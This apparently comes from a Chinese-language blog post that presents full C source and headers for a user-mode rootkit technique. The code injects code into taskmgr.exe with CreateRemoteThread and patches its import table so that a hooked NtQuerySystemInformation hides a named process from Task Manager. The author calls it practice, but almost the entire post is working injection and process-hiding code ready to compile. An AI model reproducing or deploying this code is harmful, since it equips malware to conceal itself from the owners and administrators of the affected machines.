代碼注入 API HOOK(非DLL)

使用代碼注入來實現進程隱藏  而不是使用DLL注入來實現進程隱藏  
沒有什麼高級技術  純體力活  原理就不說了  只是沒有通過DLL注入  來實現HOOK API

從核心編程 以來  似乎 一提到C注入 就是DLL注入 很奇怪 爲什麼沒人寫個完整的代碼注入

所以 自己動手寫了下
純粹注入代碼   邪惡二進制上 也有個代碼注入的 只是用了一個未公開的函數，我還看不懂
= =本來想用匯編寫的  發現彙編注入代碼遠比C注入代碼來的繁  所以用C實現了

主要功能就是 隱藏進程   不過RING3的似乎沒多大用  練習而已
代碼如下：

1. //需要編譯成release版本  DEBUG版本 對函數生成的跳轉地址表
2. //jmp xxxxx  寫入遠程進程的時候xxxxx等於寫入了一個全局變量
3. // 程序必然崩潰
4. #include "Iat_Hook.h"
7. char cPath[] = "taskmgr.exe";
9. void main(void)
10. {
11.   //定義變量
12.   DWORD dwPid;
13.   HANDLE hProcess;
14.   DWORD dwSize = 2048;
15.   PVOID pRemoteAddress, pRemoteStructAddress,MyAddress;
16.   REMOTESTRUCT stRemoteStruct;
18.   //遍歷進程 尋找taskmgr.exe進程ID
19.     dwPid = GetProcessPid(cPath);
21.   // open process 得到進程句柄
22.   hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
23.   if(hProcess == NULL)
24.   {
25.     printf("open error code %d/n",GetLastError());
26.     return;
27.   }
28.   
29.   //寫入 替代函數
30.   MyAddress = VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
31.   WriteProcessMemory(hProcess, MyAddress, myNtQuerySystemInformation, dwSize, NULL);
33.   //初始化結構
34.   InitializeStruct(&stRemoteStruct, (DWORD)MyAddress, dwPid);
36.   //寫入結構
37.   pRemoteStructAddress = VirtualAllocEx(hProcess, NULL, sizeof(REMOTESTRUCT), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
38.   WriteProcessMemory(hProcess, pRemoteStructAddress, &stRemoteStruct, sizeof(REMOTESTRUCT), NULL);
40.   //寫入遠程線程函數
41.   pRemoteAddress = VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
42.   WriteProcessMemory(hProcess, pRemoteAddress, RemoteThread, dwSize, NULL);
44.   //創建遠程線程
45.   CreateRemoteThread(hProcess, NULL, 0, pRemoteAddress,pRemoteStructAddress, 0, 0);
46.   CloseHandle(hProcess);
47. }
49. DWORD __stdcall RemoteThread(PREMOTESTRUCT pRemoteStruct)
50. {
51.   FARPROC fpVirtualQuery;
52.   FARPROC fpVirtualProtect;
53.   FARPROC fpOpenProcess;
54.   FARPROC fpEnum;
55.   FARPROC fpGetProcAddress;
56.   FARPROC fpLoadLibrary;
57.   FARPROC fpFreeLibrary;
58.   FARPROC fpWriteMemory;
59.   FARPROC fplstrcmp;
61.   HANDLE hProcess = NULL;
62.   HMODULE hMods[256];
63.   DWORD dwNeed;
64.   HANDLE hPsapi;
65.   MEMORY_BASIC_INFORMATION stMem;
66.   HMODULE hKernel, hModule;
67.   PIMAGE_NT_HEADERS pImageNtHeaders;
68.   PIMAGE_OPTIONAL_HEADER pImageOptionalHeader;
69.   IMAGE_DATA_DIRECTORY ImageImport;
70.   PIMAGE_IMPORT_DESCRIPTOR pImageImportDescriptor;
71.   PIMAGE_THUNK_DATA pImageThunkData;
72.   DWORD oldProtect;
73.   wchar_t *p = pRemoteStruct->cProcessName;
75.   //初始化函數指針
76.   fpVirtualQuery = (FARPROC)pRemoteStruct->dwVirtualQuery;
77.   fpVirtualProtect = (FARPROC)pRemoteStruct->dwVirtualProtect;
78.   fpOpenProcess = (FARPROC)pRemoteStruct->dwOpenProcess;
79.   fpLoadLibrary = (FARPROC)pRemoteStruct->dwLoadLibrary;
80.   fpFreeLibrary = (FARPROC)pRemoteStruct->dwFreeLibrary;
81.   fpGetProcAddress = (FARPROC)pRemoteStruct->dwGetProcAddress;
82.   fpWriteMemory = (FARPROC)pRemoteStruct->dwWriteProcessMemory;
83.   fplstrcmp = (FARPROC)pRemoteStruct->dwlstrcmp;
85.   //得到進程句柄
86.   hProcess =(HANDLE)fpOpenProcess(PROCESS_ALL_ACCESS, FALSE, pRemoteStruct->dwPid);
87.   if(!hProcess)
88.     return 0;
90.   //得到模塊基址 模塊基址存放於hMods[0]
91.   hPsapi = (HANDLE)fpLoadLibrary(pRemoteStruct->cDllName);
92.   fpEnum = (FARPROC)fpGetProcAddress(hPsapi, pRemoteStruct->cFunName);
93.   fpEnum(hProcess, hMods, sizeof(hMods), &dwNeed);
94.   fpFreeLibrary(hPsapi);
95.   hModule = hMods[0];
97.   //改變內存屬性  因爲採用的不是DLL插入 NtQuerySystemInformation的原始地址無法通過
98.   //全局變量傳遞給 替代函數 這裏通過把函數地址寫入kernel的PE頭 來實現 這樣只需要在替代函數中讀出地址就可以了
99.   hKernel = (HANDLE)fpLoadLibrary(pRemoteStruct->cKernel);
100.   fpVirtualQuery(hKernel,&stMem, sizeof (MEMORY_BASIC_INFORMATION));
101.   fpVirtualProtect(stMem.BaseAddress, stMem.RegionSize, PAGE_READWRITE, &stMem.Protect);
102.   fpWriteMemory(hProcess, (PBYTE)(hKernel)+4, &pRemoteStruct->dwNtQuerySystem, sizeof(DWORD), NULL);
103.   fpWriteMemory(hProcess, (PBYTE)(hKernel)+8, &pRemoteStruct->dwlstrcmpW, sizeof(DWORD), NULL);
104.   fpWriteMemory(hProcess, (PBYTE)(hKernel)+0x14, &p, sizeof(DWORD), NULL);
105.   fpVirtualProtect(stMem.BaseAddress, stMem.RegionSize, stMem.Protect, &oldProtect);
107.   //查找導入表 找到存放NtQuerySystemInformation
108.   pImageNtHeaders = (PIMAGE_NT_HEADERS)((DWORD)*((PBYTE)hModule+0x3c) + (DWORD)hModule);
109.   pImageOptionalHeader = &pImageNtHeaders->OptionalHeader;
110.     ImageImport = pImageOptionalHeader->DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];
111.   pImageImportDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)(ImageImport.VirtualAddress + (DWORD)hModule);
113.   while(pImageImportDescriptor->Name)
114.   {
115.     if(0 == fplstrcmp(pRemoteStruct->cNtdll, (PSTR)(pImageImportDescriptor->Name + (DWORD)hModule)))
116.     {      
117.       break;
118.     }
119.     pImageImportDescriptor++;
120.   }
121.   //替換 NtQuerySystemInformation的地址
122.   pImageThunkData = (PIMAGE_THUNK_DATA)(pImageImportDescriptor->FirstThunk + (DWORD)hModule);
123.   while(pImageThunkData->u1.Function)
124.   {
125.     if(pImageThunkData->u1.Function == pRemoteStruct->dwNtQuerySystem)
126.     {
127.       fpVirtualQuery(&pImageThunkData->u1.Function, &stMem, sizeof (MEMORY_BASIC_INFORMATION));
128.       fpVirtualProtect(stMem.BaseAddress, stMem.RegionSize, PAGE_READWRITE, &stMem.Protect);
129.       pImageThunkData->u1.Function =  pRemoteStruct->dwMyAddress;
130.       break;
131.     }
132.     pImageThunkData++;
133.   }
134.   fpVirtualProtect(stMem.BaseAddress, stMem.RegionSize, stMem.Protect, &oldProtect);
135.   return 0;
136. }
138. NTSTATUS WINAPI myNtQuerySystemInformation  (
139.               SYSTEM_INFORMATION_CLASS SystemInformationClass,
140.         PVOID SystemInformation,
141.           ULONG SystemInformationLength,
142.                 PULONG ReturnLength)
143. {
144.   HANDLE hKernel;
145.   NTSTATUS ntStatus;
146.   wchar_t *pName;
147.   PSYSTEM_PROCESS_INFORMATION pCurrent, pForward;
149.   FARPROC fpNtQuerySystem;
150.   FARPROC fplstrcmpW;
152.   //尋找kernel32的基址  準備讀取需要用到的函數地址
153.   _asm 
154.   {
155.     mov eax,fs:[0x30]
156.     mov eax,[eax+0xc]
157.     mov ecx,[eax+0x1c]
158.     mov ecx, [ecx]
159.     mov eax, [ecx+8]
160.     mov hKernel,eax
161.   }
162.   //取得函數地址
163.   fpNtQuerySystem = *(FARPROC *)((DWORD)hKernel + 4);
164.   fplstrcmpW = *(FARPROC *)((DWORD)hKernel + 8);
165.   //取得 需隱藏的進程名
166.   pName = *(wchar_t **)((DWORD)hKernel + 0x14);
168.   ntStatus = (NTQUERYSYSTEMINFORMATION)fpNtQuerySystem(SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength);
169.   if (SystemProcessesAndThreadsInformation == SystemInformationClass)
170.   {
171.     pForward = NULL;
172.     pCurrent = (PSYSTEM_PROCESS_INFORMATION)SystemInformation;
173.     while(pCurrent->NextEntryDelta)//檢驗是否到 最後一個進程結構
174.     {
175.       if(pCurrent->ProcessName.Buffer)
176.       {
177.         //_asm int 3
178.         if(0 == fplstrcmpW(pCurrent->ProcessName.Buffer, pName))
179.         {
180.           if(pForward)
181.           {
182.             if(pCurrent->NextEntryDelta)//隱藏的進程在鏈表中間              
183.             {
184.               pForward->NextEntryDelta += pCurrent->NextEntryDelta;
185.             }
186.             else//隱藏的進程在鏈表末端
187.               pForward->NextEntryDelta = 0;
188.           }
189.           else //要隱藏的進程在鏈表頭時
190.           {
191.             if(pCurrent->NextEntryDelta)
192.             {
193.               SystemInformation = (PBYTE)pCurrent + pCurrent->NextEntryDelta;
194.             }
195.             else
196.               SystemInformation = NULL;
197.           }
198.         }
199.       }
200.         pForward = pCurrent;
201.         pCurrent = (PSYSTEM_PROCESS_INFORMATION)(pCurrent->NextEntryDelta + (PBYTE)pForward);
202.     }
203.     //_asm int 3
204.   }
205.   return ntStatus;
206. }
209. //得到進程PID
210. DWORD GetProcessPid(char *cPath)
211. {
212.   PROCESSENTRY32 stProcess;
213.   HANDLE hSnap;
214.   BOOL bRet;
215.   hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
216.   if(hSnap == INVALID_HANDLE_VALUE)
217.   {
218.     printf("error/n");
219.     return 0;
220.   }
221.   stProcess.dwSize = sizeof (PROCESSENTRY32);
222.   bRet = Process32First(hSnap, &stProcess);
223.   if(!bRet)
224.   {
225.     printf("first error/n");
226.     return 0;
227.   }
228.   do
229.   {
230.     if(0 == strcmp(stProcess.szExeFile, cPath)) //find  process of target
231.     {
232.       break;
233.     }
234.   }while(Process32Next(hSnap, &stProcess));
236.   //確認 是否找到 目標進程
237.   if(0 != strcmp(stProcess.szExeFile, "taskmgr.exe"))
238.   {
239.     printf("can not find process/n");
240.     return 0;
241.   }
242.   CloseHandle(hSnap);
243.   return stProcess.th32ProcessID;
244. }
246. VOID InitializeStruct(PREMOTESTRUCT pRemoteStruct, DWORD MyAddress, DWORD dwPid)
247. {
248.   HANDLE hNtdll;
249.   HANDLE hKernel;
251.   hNtdll = LoadLibrary("ntdll.dll");
252.   pRemoteStruct->dwNtQuerySystem = (DWORD)GetProcAddress(hNtdll, "NtQuerySystemInformation");
253.   FreeLibrary(hNtdll);
255.   hKernel = LoadLibrary("kernel32.dll");
256.   pRemoteStruct->dwVirtualProtect = (DWORD)GetProcAddress(hKernel, "VirtualProtect");
257.   pRemoteStruct->dwVirtualQuery = (DWORD)GetProcAddress(hKernel, "VirtualQuery");
258.   pRemoteStruct->dwOpenProcess = (DWORD)GetProcAddress(hKernel, "OpenProcess");
259.   pRemoteStruct->dwGetProcAddress = (DWORD)GetProcAddress(hKernel, "GetProcAddress");
260.   pRemoteStruct->dwFreeLibrary = (DWORD)GetProcAddress(hKernel, "FreeLibrary");
261.   pRemoteStruct->dwLoadLibrary = (DWORD)GetProcAddress(hKernel, "LoadLibraryA");
262.   pRemoteStruct->dwWriteProcessMemory = (DWORD)GetProcAddress(hKernel, "WriteProcessMemory");
263.   pRemoteStruct->dwlstrcmp = (DWORD)GetProcAddress(hKernel, "lstrcmpA");
264.   pRemoteStruct->dwlstrcmpW = (DWORD)GetProcAddress(hKernel, "lstrcmpW");
265.   FreeLibrary(hKernel);
266.   
267.   pRemoteStruct->dwMyAddress = MyAddress;
268.   pRemoteStruct->dwPid = dwPid;
269.   strcpy(pRemoteStruct->cDllName, "Psapi.dll");
270.   strcpy(pRemoteStruct->cFunName, "EnumProcessModules");
271.   strcpy(pRemoteStruct->cKernel,"Kernel32.dll");
272.   strcpy(pRemoteStruct->cNtdll, "ntdll.dll");
273.         //要隱藏的進程名
274.   wcscpy(pRemoteStruct->cProcessName, L"explorer.exe");
275. }
277. Iat_Hook.h
279. //頭文件
280. #include <windows.h>
281. #include <stdio.h>
282. #include <stdlib.h>
283. #include <string.h>
284. #include <tlhelp32.h>
285. #include <imagehlp.h>
286. #include "Winternl.h"
288. #pragma comment(lib, "imagehlp")
289. //類型聲明
291. typedef int NTSTATUS;
292. typedef BOOL (__stdcall *ENUMPROCESSMODULES)(
293.             HANDLE hProcess,
294.             HMODULE* lphModule,
295.             DWORD cb,
296.             LPDWORD lpcbNeeded
297. );
299. typedef NTSTATUS (WINAPI *NTQUERYSYSTEMINFORMATION)(
300.             SYSTEM_INFORMATION_CLASS SystemInformationClass,
301.             PVOID SystemInformation,
302.             ULONG SystemInformationLength,
303.             PULONG ReturnLength
304. );
306. typedef struct _REMOTE_STRUCT
307. {
308.   DWORD dwNtQuerySystem;
309.   DWORD dwVirtualQuery;
310.   DWORD dwVirtualProtect;
311.   DWORD dwOpenProcess;
312.   DWORD dwMessageBox;
313.   DWORD dwLoadLibrary;
314.   DWORD dwGetProcAddress;
315.   DWORD dwFreeLibrary;
316.   DWORD dwWriteProcessMemory;
317.   DWORD dwlstrcmp;
318.   DWORD dwlstrcmpW;
319.   DWORD dwEnum;
320.   DWORD dwMyAddress;
321.   DWORD dwPid;
322.   char cDllName[50];
323.   char cFunName[50];
324.   char cKernel[50];
325.   char cNtdll[50];
326.   wchar_t cProcessName[50];//要隱藏的進程名
327. }REMOTESTRUCT, *PREMOTESTRUCT;
329. //函數聲明
330. DWORD GetProcessPid(char *cPath);
331. DWORD __stdcall RemoteThread(PREMOTESTRUCT pRemoteStruct);
332. VOID InitializeStruct(PREMOTESTRUCT pRemoteStruct, DWORD MyAddress, DWORD dwPid);
333. NTSTATUS WINAPI myNtQuerySystemInformation  (
334.               SYSTEM_INFORMATION_CLASS SystemInformationClass,
335.         PVOID SystemInformation,
336.           ULONG SystemInformationLength,
337.                 PULONG ReturnLength);
339. Winternl.h
341. typedef struct _UNICODE_STRING { 
342.   USHORT Length; 
343.   USHORT MaximumLength; 
344.   PWSTR  Buffer;                 //注意，這裏爲Unicode類型
345. } UNICODE_STRING, *PUNICODE_STRING;
347. typedef enum _SYSTEM_INFORMATION_CLASS {
348. SystemBasicInformation,
349. SystemProcessorInformation,
350. SystemPerformanceInformation,
351. SystemTimeOfDayInformation,
352. SystemNotImplemented1,
353. SystemProcessesAndThreadsInformation,
354. SystemCallCounts,
355. SystemConfigurationInformation,
356. SystemProcessorTimes,
357. SystemGlobalFlag,
358. SystemNotImplemented2,
359. SystemModuleInformation,
360. SystemLockInformation,
361. SystemNotImplemented3,
362. SystemNotImplemented4,
363. SystemNotImplemented5,
364. SystemHandleInformation,
365. SystemObjectInformation,
366. SystemPagefileInformation,
367. SystemInstructionEmulationCounts,
368. SystemInvalidInfoClass1,
369. SystemCacheInformation,
370. SystemPoolTagInformation,
371. SystemProcessorStatistics,
372. SystemDpcInformation,
373. SystemNotImplemented6,
374. SystemLoadImage,
375. SystemUnloadImage,
376. SystemTimeAdjustment,
377. SystemNotImplemented7,
378. SystemNotImplemented8,
379. SystemNotImplemented9,
380. SystemCrashDumpInformation,
381. SystemExceptionInformation,
382. SystemCrashDumpStateInformation,
383. SystemKernelDebuggerInformation,
384. SystemContextSwitchInformation,
385. SystemRegistryQuotaInformation,
386. SystemLoadAndCallImage,
387. SystemPrioritySeparation,
388. SystemNotImplemented10,
389. SystemNotImplemented11,
390. SystemInvalidInfoClass2,
391. SystemInvalidInfoClass3,
392. SystemTimeZoneInformation,
393. SystemLookasideInformation,
394. SystemSetTimeSlipEvent,
395. SystemCreateSession,
396. SystemDeleteSession,
397. SystemInvalidInfoClass4,
398. SystemRangeStartInformation,
399. SystemVerifierInformation,
400. SystemAddVerifier,
401. SystemSessionProcessesInformation
402. } SYSTEM_INFORMATION_CLASS;
404. typedef struct _SYSTEM_PROCESS_INFORMATION  
405. {  
406.     DWORD NextEntryDelta;  
407.     DWORD dThreadCount;  
408.     DWORD dReserved01;  
409.     DWORD dReserved02;  
410.     DWORD dReserved03;  
411.     DWORD dReserved04;  
412.     DWORD dReserved05;  
413.     DWORD dReserved06;  
414.     FILETIME ftCreateTime; /* relative to 01-01-1601 */  
415.     FILETIME ftUserTime; /* 100 nsec units */  
416.     FILETIME ftKernelTime; /* 100 nsec units */  
417.     UNICODE_STRING ProcessName;      //這就是進程名
418.     DWORD BasePriority;  
419.     DWORD dUniqueProcessId;            //進程ID
420.     DWORD dParentProcessID;  
421.     DWORD dHandleCount;  
422.     DWORD dReserved07;  
423.     DWORD dReserved08;  
424.     DWORD VmCounters;  
425.     DWORD dCommitCharge;  
426.     PVOID ThreadInfos[1]; 
427. } SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION;

後記：第一次沒有照着書 打代碼 也找不到C 注入代碼的例子 能找到的都是DLL注入 原理早就知道了 真的寫一遍 不容易 整個編寫的過程 碰到了很多問題 最終都解決了 輕鬆了